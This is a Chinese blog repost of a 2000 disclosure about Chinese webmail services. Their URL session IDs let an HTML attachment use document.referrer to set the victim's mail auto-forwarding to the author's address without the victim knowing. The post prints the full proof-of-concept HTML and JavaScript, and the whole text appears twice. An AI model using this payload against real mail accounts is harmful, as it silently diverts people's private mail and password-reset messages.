目前国内一些Web mail存在的一个安全漏洞
2009-02-19 13:34
381 查看
该Script源于上个世纪(1999年)一次在设置免费email的自动转发时看到一长串的Url时的想法...
看完这篇文章或许你应该赶紧去检查一下你email中的自动转发中有没有别人的email地址:=(
最好不要随便打开别人发给你的HTML文件...
我们知道,国内好些免费email用户登录后的认证都是靠一长串的Url(如我用ShellTools登
录后是"http://webmail.****.com/shelltools/3s91091u96kDwcgNkojF4vumXaJfhn/SignOn.gen")
及服务端保存的对照IP地址来进行的,在登录后发、看邮件,改个人资料、参数设置、邮件签名、收件助理
及自动转发等都靠这串随机ID:3s91091u96kDwcgNkojF4vumXaJfhn确认,而用户于WEB方式收信并查看你发
给他(她)的HTML附件时可以通过JavaScript的“document.referrer”获得其前一URL即带ID那一串,这时
他(她)的IP跟服务器保存的对照IP是一致的,那么获得这两个前提,聪明的你该知道不怀好意的人可以通过
该方式做那些手脚了吧:=(,下面的Script Demo实现的是将自动转发设置为"ShellTools@21cn.com"(具体
是拿那个免费email做的Demo自己猜吧~)收到该HTML附件打开的话他的自动转发就给加上去了,然后他的
邮件....顺便提一句,象OICQ等好些网站可以将你的注册密码发回你的邮箱...
该说的完了,剩下的就看代码吧,什么,看不懂?...那你来这里干什么?....
(该方式到目前为止还可以通过,但我已经将该文提前email给了email的webmaster,什么时候堵上就
不知道了。)
-----学别人一句"转载请注明出处"~ ---
shell(shelltools@21cn.com) http://shelltools.yeah.net 2000/6/14
〈HTML〉
〈HEAD〉
〈TITLE〉小心用Web方式收信〈/TITLE〉
〈/HEAD〉
〈BODY〉
网管,你好:
****的自动转发等操作存在一些安全问题,在Email用户用〈br〉
WEB方式查看信件时可以使用简单的JavaScript在“自动转发”〈br〉
中填入其它地址,将email转到其它信箱中。请查看本页的原代码中〈br〉
的Script。这个问题在国内的几个免费email中都存在。〈br〉
(如果你正用Web方式查看该email请到 配置 -〉 自动转发 中看看,〈br〉
应该被设为"ShellTools@21cn.com"了)
****用户 shell
〈form method="POST" action="AutoForward.gen" name=AddUserForm target="ShellTools"〉
〈input type=hidden name=SuUser value=〉
〈input type=hidden name=Request value=EditDone 〉
〈input type=hidden name="B1" value=" 更新 "〉
〈input type=hidden name="ForwardAddresses" value="ShellTools@21cn.com"〉
〈/form〉
〈SCRIPT Language=JScript〉
var sr=document.referrer;
var isr;
sr=sr.substring(7,30);
isr=sr.indexOf("/");
sr="http://" + sr.substring(0,isr) + "/Banner.htm";
var sr2=document.referrer;
isr=sr2.indexOf("ReadMiscPart");
if ( isr 〉 20 ){
aw=window.open("about:blank","banner1","width=500,height=60,resizable=no,menubar=no,scrollbars=no");
aw.document.write('〈HTML〉');
aw.document.write('〈HEAD〉');
aw.document.write('〈title〉设置自动转发〈/title〉');
aw.document.write('〈/head〉');
aw.document.write('〈frameset framespacing=0 rows=97%,* frameborder=no border=false〉');
aw.document.write('〈frame name=show src=' + sr + ' scrolling=no〉');
aw.document.write('〈frame name=ShellTools src=main.asp scrolling=no〉');
aw.document.write('〈noframes〉');
aw.document.write('〈body〉');
aw.document.write('〈p〉This page uses frames, but your browser doesnt support them.〈/p〉');
aw.document.write('〈/body〉');
aw.document.write('〈/noframes〉');
aw.document.write('〈/frameset〉');
aw.document.write('〈/html〉 ');
sr2 = sr2.substring(0,isr);
document.AddUserForm.action= sr2 + "AutoForward.gen";
document.AddUserForm.submit();}
window.focus();
〈/SCRIPT〉
〈/BODY〉
〈/HTML〉
看完这篇文章或许你应该赶紧去检查一下你email中的自动转发中有没有别人的email地址:=(
最好不要随便打开别人发给你的HTML文件...
我们知道,国内好些免费email用户登录后的认证都是靠一长串的Url(如我用ShellTools登
录后是"http://webmail.****.com/shelltools/3s91091u96kDwcgNkojF4vumXaJfhn/SignOn.gen")
及服务端保存的对照IP地址来进行的,在登录后发、看邮件,改个人资料、参数设置、邮件签名、收件助理
及自动转发等都靠这串随机ID:3s91091u96kDwcgNkojF4vumXaJfhn确认,而用户于WEB方式收信并查看你发
给他(她)的HTML附件时可以通过JavaScript的“document.referrer”获得其前一URL即带ID那一串,这时
他(她)的IP跟服务器保存的对照IP是一致的,那么获得这两个前提,聪明的你该知道不怀好意的人可以通过
该方式做那些手脚了吧:=(,下面的Script Demo实现的是将自动转发设置为"ShellTools@21cn.com"(具体
是拿那个免费email做的Demo自己猜吧~)收到该HTML附件打开的话他的自动转发就给加上去了,然后他的
邮件....顺便提一句,象OICQ等好些网站可以将你的注册密码发回你的邮箱...
该说的完了,剩下的就看代码吧,什么,看不懂?...那你来这里干什么?....
(该方式到目前为止还可以通过,但我已经将该文提前email给了email的webmaster,什么时候堵上就
不知道了。)
-----学别人一句"转载请注明出处"~ ---
shell(shelltools@21cn.com) http://shelltools.yeah.net 2000/6/14
〈HTML〉
〈HEAD〉
〈TITLE〉小心用Web方式收信〈/TITLE〉
〈/HEAD〉
〈BODY〉
网管,你好:
****的自动转发等操作存在一些安全问题,在Email用户用〈br〉
WEB方式查看信件时可以使用简单的JavaScript在“自动转发”〈br〉
中填入其它地址,将email转到其它信箱中。请查看本页的原代码中〈br〉
的Script。这个问题在国内的几个免费email中都存在。〈br〉
(如果你正用Web方式查看该email请到 配置 -〉 自动转发 中看看,〈br〉
应该被设为"ShellTools@21cn.com"了)
****用户 shell
〈form method="POST" action="AutoForward.gen" name=AddUserForm target="ShellTools"〉
〈input type=hidden name=SuUser value=〉
〈input type=hidden name=Request value=EditDone 〉
〈input type=hidden name="B1" value=" 更新 "〉
〈input type=hidden name="ForwardAddresses" value="ShellTools@21cn.com"〉
〈/form〉
〈SCRIPT Language=JScript〉
var sr=document.referrer;
var isr;
sr=sr.substring(7,30);
isr=sr.indexOf("/");
sr="http://" + sr.substring(0,isr) + "/Banner.htm";
var sr2=document.referrer;
isr=sr2.indexOf("ReadMiscPart");
if ( isr 〉 20 ){
aw=window.open("about:blank","banner1","width=500,height=60,resizable=no,menubar=no,scrollbars=no");
aw.document.write('〈HTML〉');
aw.document.write('〈HEAD〉');
aw.document.write('〈title〉设置自动转发〈/title〉');
aw.document.write('〈/head〉');
aw.document.write('〈frameset framespacing=0 rows=97%,* frameborder=no border=false〉');
aw.document.write('〈frame name=show src=' + sr + ' scrolling=no〉');
aw.document.write('〈frame name=ShellTools src=main.asp scrolling=no〉');
aw.document.write('〈noframes〉');
aw.document.write('〈body〉');
aw.document.write('〈p〉This page uses frames, but your browser doesnt support them.〈/p〉');
aw.document.write('〈/body〉');
aw.document.write('〈/noframes〉');
aw.document.write('〈/frameset〉');
aw.document.write('〈/html〉 ');
sr2 = sr2.substring(0,isr);
document.AddUserForm.action= sr2 + "AutoForward.gen";
document.AddUserForm.submit();}
window.focus();
〈/SCRIPT〉
〈/BODY〉
〈/HTML〉
相关文章推荐
- 《目前国内一些免费email存在的一个安全漏洞》
- 《目前国内一些免费email存在的一个安全漏洞》
- 《目前国内一些免费email存在的一个安全漏洞》
- 能存活19年的bug不是bug——有感于微软宣布修复了一个存在了19年的安全漏洞
- FreeTextBox中存在一个严重的安全漏洞
- 关于“微软IE浏览器存在一个严重的0 day”安全漏洞的紧急通知
- FreeTextBox中存在一个严重的安全漏洞
- 报告发现最新版Java存在一个安全漏洞
- 惊爆:软件更新存在安全漏洞
- [网站安全] [实战分享]WEB漏洞挖掘的一些经验分享
- Sun公司发布警告 Java中存在安全漏洞
- 专家提醒:博客网站中存在的安全漏洞隐患
- Nginx + PHP CGI的一个可能的安全漏洞(转)
- 120941138.三星处理器被发现存在严重安全漏洞
- Nginx + PHP CGI的一个可能的安全漏洞
- 转发一个《SOC竞争对手分析和规划@启明星辰.ppt》from bbs.cisp&国内的一些SOC产品架构图
- 【转】卡巴斯基安全公告称甲骨文数据库存在加密漏洞
- 详讯:微软承认Outlook中存在严重安全漏洞
- [安全漏洞公告专区]【漏洞公告】WordPress的Display Widgets插件存在后门
- Redis故障案例(二)-记一个Redis安全漏洞和安全规范